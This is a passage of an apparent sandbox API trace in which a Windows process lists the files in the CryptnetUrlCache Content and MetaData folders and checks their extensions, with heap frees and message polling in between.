hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0098.064] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0098.065] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.065] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.065] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.065] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.065] PathFindFileNameW (pszPath="") returned="" [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0098.066] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0098.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.066] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0098.067] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0098.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, 